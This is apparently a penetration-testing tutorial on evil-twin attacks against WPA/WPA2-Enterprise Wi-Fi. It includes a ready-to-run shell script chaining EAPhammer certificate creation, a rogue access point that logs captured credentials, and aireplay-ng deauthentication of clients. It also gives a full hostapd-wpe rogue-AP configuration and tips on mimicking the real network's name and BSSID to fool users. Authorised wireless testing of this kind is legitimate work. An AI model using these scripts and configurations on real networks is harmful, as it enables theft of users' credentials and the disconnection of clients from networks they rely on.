Evil-Twin Attack
Eaphammer
The Evil Twin attack against a WPA/WPA2 Enterprise network consists in standing up a rogue access point (honeypot) backed by a RADIUS server controlled by the attacker. The attacker waits for an unwary client to associate with the rogue AP and accept the server certificate it presents. Once the client accepts that certificate, the TLS tunnel of the outer EAP method (PEAP or EAP-TTLS) terminates on the attacker's RADIUS server instead of the legitimate one, so the attacker sees the inner authentication exchange and can recover the user's credentials: a plaintext password for inner methods such as PAP or GTC, or an MS-CHAPv2 challenge/response pair that can be cracked offline.
To entice users into connecting to the fake AP and accepting the rogue certificate, the attacker builds an access point and a certificate whose properties (ESSID, a BSSID close to the real one, certificate subject and issuer names) resemble those of the legitimate network.
WPA Enterprise
First, create a rogue certificate (EAPhammer's certificate wizard does this). It is the certificate presented to the client when it connects to the fake AP.
Next, start the fake access point together with the RADIUS server the clients will authenticate against.
Then, using aireplay-ng, perform a deauthentication attack to disconnect the targeted clients from the legitimate access point and push them towards the honeypot.
The success of this attack depends on several factors, among them competing signals in the environment: a strong signal from the legitimate access point can keep clients from roaming to the rogue one.
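The three steps above, wired together as a script. This is an added example, not the page's own material nor EAPhammer project code: interface names, ESSID, BSSIDs, channel and client MAC are placeholders to replace with the values observed during reconnaissance, and the script assumes two wireless cards (one for the rogue AP, one already put in monitor mode with airmon-ng for the deauthentication). Set DRY_RUN=1 to print the commands instead of running them.

```shell
#!/bin/sh
# Added example: drives the WPA/WPA2-Enterprise evil-twin procedure with
# EAPhammer and aireplay-ng. All values below are placeholders (assumptions).
set -eu

AP_IFACE="${AP_IFACE:-wlan0}"         # card EAPhammer uses for the rogue AP
MON_IFACE="${MON_IFACE:-wlan1mon}"    # second card in monitor mode (airmon-ng start wlan1)
ESSID="${ESSID:-CorpWiFi}"            # exact same network name as the target
LEGIT_BSSID="${LEGIT_BSSID:-00:11:22:33:44:55}"   # BSSID of the legitimate AP (deauth target)
ROGUE_BSSID="${ROGUE_BSSID:-00:11:22:33:44:56}"   # similar to the legitimate one, not identical
CHANNEL="${CHANNEL:-6}"
DRY_RUN="${DRY_RUN:-0}"               # 1 = print commands only

# Print the command line in dry-run mode, otherwise execute it.
run() {
  if [ "$DRY_RUN" = 1 ]; then
    printf '%s\n' "$*"
  else
    "$@"
  fi
}

# Step 1: generate the rogue server certificate with EAPhammer's wizard.
make_cert() {
  run ./eaphammer --cert-wizard
}

# Step 2: start the rogue AP and RADIUS server; --creds logs captured credentials.
start_rogue_ap() {
  run ./eaphammer --interface "$AP_IFACE" --essid "$ESSID" --bssid "$ROGUE_BSSID" \
      --channel "$CHANNEL" --auth wpa-eap --creds
}

# Step 3: deauthenticate clients from the legitimate AP.
# $1 = number of deauth bursts, $2 = optional client MAC (omit for broadcast deauth).
deauth_clients() {
  count="$1"
  client="${2:-}"
  if [ -n "$client" ]; then
    run aireplay-ng -0 "$count" -a "$LEGIT_BSSID" -c "$client" "$MON_IFACE"
  else
    run aireplay-ng -0 "$count" -a "$LEGIT_BSSID" "$MON_IFACE"
  fi
}

# Full sequence; only runs when the script is invoked with the argument "start",
# e.g. `sh evil_twin.sh start` (EAPhammer keeps the foreground, so it is backgrounded).
main() {
  make_cert
  start_rogue_ap &
  sleep 10                       # give hostapd time to bring the AP up
  deauth_clients 5 "${TARGET_CLIENT:-}"
  wait
}

case "${1:-}" in
  start) main ;;
esac
```

Targeted deauthentication (a client MAC in `-c`) is quieter than the broadcast form and is what you want against a single user during a time-boxed test; repeat the bursts if the client reconnects to the legitimate AP before trying the rogue one.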
Some considerations
NetworkManager must not manage wlan0 while the attack runs; it will otherwise fight hostapd for the interface.
Use a BSSID that is similar to the legitimate BSSID, but not exactly the same.
Use the exact same network name (ESSID); users recognise the name, not the BSSID (social engineering).
During an intrusion test with a limited time frame, we can create a fake AP with an arbitrary name and ask the customer to connect a test device to it, impersonating a user who would connect to the fake AP. The device should be prompted with a logon box inviting the user to enter credentials. The test credentials the customer will use should be defined in EAPhammer beforehand.
Active vs Passive Honeypot
Passive honeypot: a passive honeypot does nothing to entice users to connect. It is simply brought up and the attacker waits for a client to connect on its own.
Active honeypot: an active honeypot uses the Karma attack to draw clients in. The rogue AP listens for client probe requests and answers each one with a probe response carrying the ESSID the client asked for, so devices that remember that network associate automatically.
An active honeypot can also send deauthentication packets to force users off the legitimate AP so that they reconnect, this time to the rogue AP.
Hostapd
Configuration file for a rogue WPA/WPA2 Enterprise access point, to be run with hostapd-wpe (the patched hostapd that logs the inner authentication).
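A minimal configuration of this kind, as an added example rather than the page's own file or the hostapd-wpe project's shipped config. The interface, ESSID, channel and certificate paths are placeholders; the certificate files are the ones produced by the certificate wizard or by openssl.

```ini
# Added example: hostapd-wpe style config for a rogue WPA2-Enterprise AP.
# Interface, ssid, channel and file paths are placeholders (assumptions).
interface=wlan0
driver=nl80211
ssid=CorpWiFi
hw_mode=g
channel=6

# 802.1X with the built-in EAP server: hostapd itself plays the rogue RADIUS role,
# so every inner authentication (MSCHAPv2, GTC, PAP) terminates here.
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
eapol_key_index_workaround=0

# Certificate chain presented to the client; this is what the user is asked to accept.
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=changeme
dh_file=/etc/hostapd-wpe/certs/dh

# WPA2-Enterprise (RSN) with CCMP; use wpa=3 to also accept WPA1 clients.
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
rsn_pairwise=CCMP
```

The file named in `eap_user_file` is what makes the honeypot accept any identity: it lists the outer methods to offer for any user (a `*` wildcard line with PEAP, TTLS, TLS and FAST) and a phase-2 line that accepts the inner methods with a fixed password, so the client negotiates its usual inner method and hostapd-wpe logs the challenge/response or plaintext credential it sends.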
Resources
Ryan, Gabriel. (2019). Modern Wireless Tradecraft Pt I: Basic Rogue AP Theory, Evil Twin and Karma Attacks.